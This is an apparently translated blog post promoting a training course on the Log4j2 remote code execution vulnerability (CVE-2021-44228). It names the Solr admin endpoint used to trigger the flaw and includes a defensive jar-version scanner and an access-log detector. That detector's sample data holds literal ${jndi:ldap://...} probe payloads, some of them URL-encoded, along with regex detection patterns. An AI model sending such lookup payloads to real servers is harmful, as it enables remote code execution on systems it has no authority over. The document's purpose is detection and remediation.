How to view Apache log4j 2 remote code execution vulnerability?
2022-07-05 21:50:00 【Blue bridge cloud class】
Apache Log4j2 is a leading Java logging framework, and a large number of business frameworks depend on this component.
On 24 November 2021, the Alibaba Cloud security team reported a remote code execution vulnerability in Apache Log4j2 to Apache. The vulnerability is easy to trigger and extremely damaging.
In the early hours of 10 December, the details of the remote code execution vulnerability in the Apache open-source project Log4j were made public. Because some Log4j2 features recursively parse (look up) the strings they are given, an attacker can directly construct a malicious request that triggers remote code execution.
CVE number: CVE-2021-44228
Affected versions: log4j2 2.0-beta9 to 2.14.1
As soon as the news broke, many security engineers lost their sleep, got up immediately and entered "combat defense mode". It reminds me of the recent epidemic in Zhejiang, where medical staff rushed into "combat mode" overnight.
(PS: the epidemic has been flaring up recently; everyone please wash your hands often, wear a mask, and don't run around!)
Besides the security staff of individual enterprises, the major security vendors also immediately started verifying whether the vulnerability was real, and urgently notified users to upgrade their rules to block the new vulnerability and stop its damage from spreading.
How serious is it? Let me give you one comparison and you can judge for yourself:
Patching an enterprise may take several hours, or even several days, whereas an attack takes only a few minutes! Which is faster, patching or the hackers' attack? I don't need to say more.
Apache Log4j2 is not a specific web service but a third-party logging framework (library) for handling logs, and any Java web application may use it. The number of projects using Log4j2 is really enormous, too many to count.
If you really had to count, it would be faster to count the projects that do not use Log4j2. You can imagine how wide the impact is once attacks begin.
How do we reproduce this vulnerability, and how do we fix it?
Any Java web service that uses the log4j2 library (a version within the affected range) can be used to reproduce the vulnerability, for example Apache Solr.
Triggering the vulnerability is very simple: send the payload in the action parameter of the Solr administrator interface. Because the interface logs that parameter through log4j, the vulnerability is triggered. The interface is as follows:
http://127.0.0.1:8983/solr/admin/cores?action=
Next, use DNSlog to construct a verification payload.
Most students of penetration testing will be familiar with DNS log; it is often used to test blind vulnerabilities (blind XSS, blind injection).
If you are not familiar with it, think of it this way: we obtain a temporary domain name; if the remote server tries to resolve that domain, an access record is left on the DNS side, and by querying that record we obtain information out of band.
Of course, DNS log is only one way to verify that the vulnerability exists; it is not the only option.
Blue bridge cloud class has quickly jumped on this hot topic and launched "Apache Log4j 2 Remote Code Execution Vulnerability Explained", a hands-on experiment to help you reproduce the Apache Log4j2 remote code execution vulnerability.
The course covers the vulnerability's principle, exploitation, discovery and remediation in detail, and includes an online lab environment so you can understand the vulnerability more deeply.
Here comes the key point! Go and learn it now, for free!
Apache Log4j 2 Remote code execution vulnerability
Now let's talk about vulnerability discovery methods and tools.
Vulnerability discovery can be approached from two angles, white box and black box:
- If you are reviewing whether your own application is affected by the log4j2 vulnerability, white-box testing should be your first choice: it lets you do the most comprehensive check at the source-code level.
- Black-box testing carries great uncertainty, because from a black-box perspective any parameter may trigger the log4j2 vulnerability. The accuracy of a black-box test therefore depends largely on whether the tested parameters are comprehensive.
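To make the white-box check concrete, here is an added example (not code from the article or from Blue bridge cloud class) that walks a deployment directory, opens every jar/war/ear, recurses into nested archives, reads the log4j-core version from its Maven metadata and compares it against the affected range the article states (2.0-beta9 to 2.14.1). It also reports whether the JndiLookup class is present. The fixture jars built by demo() are constructed and contain only the markers the scanner reads, not a real Log4j build.

```python
import io
import os
import re
import shutil
import tempfile
import zipfile

# Affected range as stated in the article: log4j-core 2.0-beta9 through 2.14.1.
AFFECTED_MIN = "2.0-beta9"
AFFECTED_MAX = "2.14.1"

# Markers a real log4j-core jar carries: the Maven metadata with its version,
# and the JndiLookup class that implements the JNDI lookup.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}   # pre-releases sort before final (3)


def version_key(version):
    """Map '2.0-beta9' or '2.14.1' to a tuple that compares in release order."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([a-z]+)(\d*))?",
                     version.strip().lower())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch, tag, num = m.groups()
    rank = _PRE_RANK.get(tag, 3) if tag else 3
    return (int(major), int(minor), int(patch or 0), rank, int(num or 0))


def is_affected(version):
    return version_key(AFFECTED_MIN) <= version_key(version) <= version_key(AFFECTED_MAX)


def inspect_archive(data, name):
    """Yield (name, log4j-core version or None, jndi_lookup_present) for this
    archive and, recursively, for every .jar/.war/.ear nested inside it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version is not None or JNDI_CLASS in names:
            yield name, version, JNDI_CLASS in names
        for inner in names:
            if inner.endswith((".jar", ".war", ".ear")):
                yield from inspect_archive(zf.read(inner), f"{name}!{inner}")


def scan_tree(root):
    """Walk a directory tree and report every log4j-core found with a verdict.
    A jar with JndiLookup but no readable version is treated as affected."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith((".jar", ".war", ".ear")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                data = fh.read()
            for name, version, has_jndi in inspect_archive(data, path):
                affected = is_affected(version) if version else has_jndi
                findings.append({"archive": name, "version": version,
                                 "jndi_lookup_present": has_jndi,
                                 "affected": affected})
    return findings


def build_fake_jar(version=None, with_jndi=True, nested=()):
    """Constructed fixture: a zip carrying only the markers the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
        for inner_name, inner_bytes in nested:
            zf.writestr(inner_name, inner_bytes)
    return buf.getvalue()


def demo():
    """Build a constructed tree (two loose jars plus a war with a nested jar),
    scan it, clean up, and return the findings."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    try:
        lib = os.path.join(root, "lib")
        os.makedirs(lib)
        with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as fh:
            fh.write(build_fake_jar("2.14.1"))
        with open(os.path.join(lib, "log4j-core-2.16.0.jar"), "wb") as fh:
            fh.write(build_fake_jar("2.16.0", with_jndi=False))
        inner = build_fake_jar("2.0-beta9")
        with open(os.path.join(root, "app.war"), "wb") as fh:
            fh.write(build_fake_jar(with_jndi=False,
                                    nested=[("WEB-INF/lib/log4j-core-2.0-beta9.jar", inner)]))
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point scan_tree() at a real deployment directory to use it. Checking nested archives matters because fat jars and wars bundle log4j-core under BOOT-INF/lib or WEB-INF/lib, where a flat file listing would miss it; the JndiLookup marker catches rebuilt or shaded jars whose Maven metadata was stripped.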
I recommend two tools for your reference:
1、 For white-box testing, the following tool is recommended for scanning the source code:
CVE-2021-44228-Scanner
Download the version for your platform:
2、 For black-box testing, the following tool is recommended:
BurpSuite Pro plug-ins
Open BurpSuite Pro, switch to Extender -> BApp Store, search for log4 in the search box on the right, and you will see two plug-ins (as of 22 December 2021):
- Log4Shell Everywhere: passive scanning plug-in
- Log4Shell Scanner: active scanning plug-in
Install both plug-ins; Active Scan and Passive Scan will then automatically check for the log4j vulnerability, and any findings are shown in the Dashboard.
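The Burp plug-ins probe from the outside; the defender's counterpart is to look for the same lookup strings in what the application already received. The following added example (not code from the article or from Blue bridge cloud class) parses combined-format web access logs, URL-decodes each user-controlled field, and flags requests carrying a Log4j2 lookup that mentions jndi, or any lookup syntax at all. The log lines, IP addresses and the dnslog.invalid host are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). Not real traffic.
SAMPLE_LOG = r'''
10.0.0.5 - - [10/Dec/2021:03:12:01 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:03:12:07 +0000] "GET /solr/admin/cores?action=${jndi:ldap://dnslog.invalid/probe} HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.9 - - [10/Dec/2021:03:12:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "%24%7Bjndi%3Aldap%3A%2F%2Fdnslog.invalid%2Fua%7D"
10.0.0.3 - - [10/Dec/2021:03:13:44 +0000] "POST /api/login HTTP/1.1" 401 88 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

# client ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$')

# A Log4j2 lookup whose body mentions jndi (the CVE-2021-44228 trigger).
JNDI_RE = re.compile(r"\$\{[^}]*jndi[^}]*\}", re.IGNORECASE)
# Any lookup syntax in a user-controlled field deserves a second look.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")


def normalize(value, rounds=3):
    """Percent-decode repeatedly (bounded) so encoded payloads become visible."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_line(line):
    """Return a dict describing the request and its hits, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, request, status, _size, referer, ua = m.groups()
    fields = {"request": request, "referer": referer, "user_agent": ua}
    hits = []
    for name, raw in fields.items():
        text = normalize(raw)
        if JNDI_RE.search(text):
            hits.append((name, "jndi-lookup"))
        elif LOOKUP_RE.search(text):
            hits.append((name, "lookup-syntax"))
    return {"ip": ip, "time": ts, "status": status, "hits": hits}


def scan_log(text):
    """Return only the parsed lines that produced at least one hit."""
    alerts = []
    for line in text.strip().splitlines():
        result = analyze_line(line)
        if result and result["hits"]:
            alerts.append(result)
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Treat this as a first-pass signature, not a complete rule: the lookup can be obfuscated in ways a plain substring match will not see, which is why the weaker lookup-syntax rule is kept alongside the jndi rule, and why the version scan of the deployed jars remains the authoritative check.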
OK, that's all for today's sharing on the Apache Log4j 2 remote code execution vulnerability. If you want to reproduce this vulnerability and practice by yourself, click the link below for free~
Apache Log4j 2 Remote code execution vulnerability